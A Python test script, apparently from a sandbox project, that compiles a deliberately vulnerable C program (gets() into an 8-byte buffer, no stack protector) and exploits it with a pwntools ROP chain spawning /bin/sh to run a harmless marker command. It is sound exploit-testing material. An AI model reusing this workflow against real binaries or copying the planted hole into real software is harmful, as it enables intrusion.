
#!/usr/bin/env python
# coding: utf-8
#
# stack-pivot: Perform a simple ROP with a stack pivot.
# Copyright (c) 2024 Ali Polatel <alip@chesswob.org>
# SPDX-License-Identifier: GPL-3.0

import os, sys, subprocess, shutil, time

# Check if pwntools is installed.
# pwntools is the only third-party dependency of this script; if it cannot be
# imported, report the ImportError on stderr and exit with status 127.
try:
    from pwn import context, ELF, process, log, cyclic, cyclic_find, ROP
except ImportError as e:
    sys.stderr.write("[!] Pwntools is not installed. Exiting: %r\n" % e)
    sys.exit(127)
else:
    # Point pwntools' terminal command at `echo ENOTTY`.
    # NOTE(review): presumably so that nothing tries to open a real terminal
    # emulator when the script runs non-interactively -- confirm intent.
    context.terminal = ["echo", "ENOTTY"]

# Refuse to run on anything but x86 (exit status 127).
# NOTE(review): context.binary is only assigned later, inside generate_rop(),
# so at this point context.arch is whatever pwntools' context holds right
# after import -- confirm this gate really reflects the target architecture.
if context.arch not in ("amd64", "i386"):
    log.warn("This script only works on X86 ATM. Exiting.")
    sys.exit(127)

# Constants
# Same value as the `char buf[8]` in the embedded C program below; it is not
# referenced by any function visible in this file.
BUF_SIZE = 8
# Files this script (or the spawned shell command) creates in the working
# directory; clean() iterates over this list.
TEMP_FILES = ["vuln.c", "vuln", "rop.bin", "rop.txt", "pwned"]


def compile_vuln():
    """Write the vulnerable C program to ``vuln.c`` and build ``./vuln``.

    The program reads a line with ``gets()`` into an 8-byte stack buffer and
    exports ``sh`` / ``sh_argv`` so the ROP chain can reference them.  It is
    compiled statically, without stack protector and without PIE.

    Exits the interpreter with status 127 if the compiler returns a non-zero
    status.  Both ``vuln.c`` and ``vuln`` are created in the current working
    directory.
    """
    # C code for the vulnerable program.
    # NOTE: this is a plain (non-formatted) string, so the doubled braces
    # below are written to vuln.c as-is; in C they are just nested blocks.
    vuln_c_code = """
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Symbol to /bin/sh for convenience.
 */
char *sh = "/bin/sh";

/*
 * 1. We use argv so tests work under busybox.
 * 2. We use a one-shot command to avoid stdin races.
 */
char *sh_argv[] = {
    "/bin/sh",
    "-cex",
    "echo 'ROP: Change return success. "
          "Going and coming without error. "
          "Action brings good fortune.'; "
    "sleep 1; "
    "touch pwned; "
    "exit 42",
    NULL,
};

int overflow(void) {{
    char buf[8];
    gets(buf); /* Vulnerable to buffer overflow */
    return 0;
}}

int main(void) {{
    overflow();
    if (getuid() + getpid() == 0) {{
#ifdef __x86_64__
        __asm__ __volatile__ (
            "pop %rdi; ret;"
            "pop %rsi; ret;"
            "pop %rdx; ret;"
            "pop %rax; ret;"
        );
#endif
        execve("/bin/sh", 0, 0);
    }}
    return 0;
}}
    """

    # Write the C code to a file.
    log.info("Writing C code to vuln.c")
    with open("vuln.c", "w") as f:
        f.write(vuln_c_code)

    # Compile the vulnerable program.
    # This must be ONE string: with shell=True only the first element of a
    # sequence is executed as the command line, any further elements become
    # positional parameters of the shell itself.  A stray comma here used to
    # turn the command into a 2-tuple and silently drop every flag from
    # "-Wl,-z,now" onwards.
    cc_cmd = (
        "cc -ansi -pedantic "
        "-g -O0 -Wall "
        "-fno-stack-protector -no-pie "
        "-static vuln.c -o vuln "
        "-Wl,-no-pie "
        "-Wl,-z,now -Wl,-z,relro "
        "-Wl,--whole-archive "
        "-lc -lpthread -lrt -ldl -lm "
        "-Wl,--no-whole-archive"
    )
    log.info("Compiling the vulnerable program.")
    log.info(f"{cc_cmd}")
    try:
        result = subprocess.run(
            cc_cmd,
            shell=True,
            check=True,
            stderr=subprocess.PIPE,
            stdout=subprocess.PIPE,
        )
        # Surface compiler diagnostics (warnings) even on success.
        log.info(result.stderr.decode())
        log.info(result.stdout.decode())
    except subprocess.CalledProcessError as e:
        log.warn(
            f"Compilation of vulnerable program failed. Exiting.\n{e.stderr.decode()}"
        )
        sys.exit(127)


def generate_rop():
    """Find the return-address offset in ``./vuln`` and save a ROP payload.

    Steps:
      1. Crash ``./vuln`` with a cyclic pattern and read the resulting core
         dump to learn how many bytes precede the saved return address.
      2. Build a ROP chain that calls ``execve("/bin/sh", sh_argv, 0)``.
      3. Write the raw payload to ``rop.bin`` and a textual dump of the chain
         to ``rop.txt`` (the dump is also printed on stderr).

    Exits the interpreter with status 127 when the architecture is not
    handled, no core dump is available, the pattern cannot be located, or a
    required string/symbol is missing from the binary.
    """
    # Set context for pwntools.
    context.binary = "./vuln"
    elf = ELF("./vuln")

    # Ensure core dumps are unlimited.
    log.info("Setting core dump size to unlimited.")
    try:
        subprocess.run(
            ["prlimit", "--pid", str(os.getpid()), "--core=unlimited"], check=True
        )
    except (OSError, subprocess.CalledProcessError):
        # Best effort: OSError covers a missing or non-executable prlimit.
        log.warn("Failed to set core dump size to unlimited.")
        log.warn("The next step may fail.")

    # Generate a cyclic pattern and send it to the vulnerable program.
    log.info("Generating cyclic pattern to find offset.")
    pattern = cyclic(128)
    p = process("./vuln")
    p.sendline(pattern)
    p.wait()

    # Extract the core dump.
    core = p.corefile
    if core is None:
        log.warn("No core dump available for the crashed process. Exiting.")
        sys.exit(127)
    arch = context.arch

    # Pick the pattern bytes that overwrote the saved return address.
    if arch == "amd64":
        # The pattern is not a valid address, so the faulting `ret` is
        # expected to leave rsp pointing at the overwritten return address.
        crash_pattern = core.read(core.rsp, 4)
    elif arch == "i386":
        # A 32-bit core has no `rsp` register.  Here the bogus return address
        # has already been popped, so the pattern value is in eip.
        # NOTE(review): usual pwntools idiom; confirm on a 32-bit build.
        crash_pattern = core.eip
    elif arch == "arm" or arch == "aarch64":
        # NOTE(review): kept as-is from the x86-64 approach; unverified.
        crash_pattern = core.read(core.sp, 4)
    else:
        log.warn(f"Unsupported architecture: {arch}")
        sys.exit(127)

    offset = cyclic_find(crash_pattern)
    if offset < 0:
        # cyclic_find() reports "not found" as -1; a negative offset would
        # silently produce a payload with no padding at all.
        log.warn("Could not locate the cyclic pattern in the core dump. Exiting.")
        sys.exit(127)
    log.info(f"Offset is {offset}.")

    log.info(f"Removing coredump file '{core.path}'")
    try:
        os.remove(core.path)
    except OSError:
        log.warn(f"Failed to remove coredump file '{core.path}'")

    # Clear ROP cache (best effort; failure here is deliberately ignored).
    try:
        ROP.clear_cache()
    except Exception:
        pass

    # Find ROP gadgets.
    log.info("Finding ROP gadgets and locating '/bin/sh'")
    rop = ROP(elf)

    # Find /bin/sh string.
    bin_sh = next(elf.search(b"/bin/sh"), None)
    if bin_sh is None:
        log.warn("String '/bin/sh' not found in ./vuln. Exiting.")
        sys.exit(127)
    log.info("Located '/bin/sh' at %#x." % bin_sh)

    # Find argument array.
    sh_argv = elf.symbols.get("sh_argv")
    if sh_argv is None:
        log.warn("Symbol 'sh_argv' not found in ./vuln. Exiting.")
        sys.exit(127)
    log.info("Located 'sh_argv' at %#x." % sh_argv)

    # Construct the payload.
    log.info("Constructing the ROP chain.")
    payload = b"A" * offset  # Overflow buffer.

    # Add ROP chain to the payload.
    rop.call("execve", [bin_sh, sh_argv, 0])
    payload += rop.chain()

    # Print payload for debugging
    log.info("ROP payload is %d bytes." % len(payload))
    rop_dump = rop.dump()
    print(rop_dump, file=sys.stderr)
    with open("rop.txt", "w") as f:
        print(rop_dump, file=f)
    log.info("ROP textual dump saved to 'rop.txt' for inspection.")

    # Save the ROP details to a file.
    with open("rop.bin", "wb") as f:
        f.write(payload)

    log.info("ROP payload saved to file 'rop.bin'")
    log.info('Do "stack-pivot run" in the same directory to perform exploitation.')


def run_exploit(timeout="10"):
    """Feed the saved ROP payload to ``./vuln`` and report the outcome.

    The payload is read from ``rop.bin`` and written to the standard input
    of ``./vuln``.  An attempt counts as successful when the process exits
    with status 42 and a file named ``pwned`` exists afterwards.  Up to ten
    attempts are made.

    Args:
        timeout: Per-attempt wait in seconds; anything ``int()`` accepts
            (the command line passes it as a string).

    Raises:
        ValueError: If ``timeout`` cannot be converted to an integer.
        OSError: If ``rop.bin`` cannot be read.

    This function does not return: it exits the interpreter with status 42
    on success and with status 0 when every attempt failed.
    """
    timeout = int(timeout)

    # Load the ROP details from the file.
    with open("rop.bin", "rb") as f:
        payload = f.read()

    def reap(proc):
        """Kill ``proc`` (best effort), close its stdin pipe and collect it."""
        try:
            proc.kill()
        except OSError:
            pass
        try:
            if proc.stdin is not None and not proc.stdin.closed:
                proc.stdin.close()
        except OSError:
            # Closing flushes; a dead reader may raise BrokenPipeError.
            pass
        proc.wait()

    # Function to attempt exploit without using pwntools
    def attempt_exploit(timeout=10):
        try:
            p = subprocess.Popen(["./vuln"], stdin=subprocess.PIPE)
        except OSError:
            # ./vuln missing or not executable: nothing to clean up.
            return False

        try:
            log.info("Writing the ROP payload to vulnerable program's standard input.")
            p.stdin.write(payload + b"\n")

            log.info("Flushing vulnerable program's standard input.")
            p.stdin.flush()

            log.info("Closing vulnerable program's standard input.")
            p.stdin.close()

            log.info(f"Waiting for {timeout} seconds...")
            p.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            log.warn("Timeout expired!")
            # wait() does not kill the child on timeout; without this the
            # process would linger and could still touch 'pwned' during a
            # later attempt.
            reap(p)
            return False
        except Exception:
            reap(p)
            return False
        return p.returncode == 42 and os.path.exists("pwned")

    # Attempt the exploit up to 10 times.
    max_attempts = 10
    for attempt in range(max_attempts):
        log.info("Running the vulnerable program.")
        log.info(f"Attempt {attempt + 1} of {max_attempts} with {timeout} seconds timeout.")
        if attempt_exploit(timeout):
            log.warn("Successfully smashed the stack using a ROP chain!")
            sys.exit(42)
        else:
            log.info(f"Attempt {attempt + 1} failed.")

    log.info("All attempts failed.")
    sys.exit(0)


def clean(temp_files=None):
    """Remove the artefacts this script leaves in the working directory.

    Args:
        temp_files: Iterable of paths to delete.  Defaults to the
            module-level ``TEMP_FILES`` list.

    Paths that do not exist are skipped.  Regular files and symlinks are
    unlinked; real directories are removed recursively.  (``shutil.rmtree``
    alone cannot be used here: it raises ``NotADirectoryError`` on the
    regular files this script produces.)
    """
    if temp_files is None:
        temp_files = TEMP_FILES

    for temp_file in temp_files:
        if os.path.isdir(temp_file) and not os.path.islink(temp_file):
            shutil.rmtree(temp_file)
        elif os.path.lexists(temp_file):
            os.remove(temp_file)


def print_help():
    """Write the list of supported sub-commands to standard output."""
    usage_lines = (
        "Usage:",
        "stack-pivot init  - Runs the preparation",
        "stack-pivot run   - Runs the exploitation",
        "stack-pivot clean - Runs the cleanup",
        "stack-pivot help  - Prints this help message",
        "stack-pivot       - Prints this help message",
    )
    for usage_line in usage_lines:
        print(usage_line)


def main():
    """Dispatch on the first command-line argument.

    ``init`` compiles the vulnerable program and generates the payload,
    ``run`` performs the exploitation (an optional second argument is
    forwarded as the timeout, default "10"), ``clean`` removes temporary
    files.  A missing or unrecognised command prints the help text and exits
    with status 0.
    """
    args = sys.argv[1:]
    command = args[0] if args else None

    if command == "init":
        compile_vuln()
        generate_rop()
        return

    if command == "run":
        run_exploit(args[1] if len(args) > 1 else "10")
        return

    if command == "clean":
        clean()
        return

    # No command, "help", or anything unrecognised.
    print_help()
    sys.exit(0)


if __name__ == "__main__":
    main()
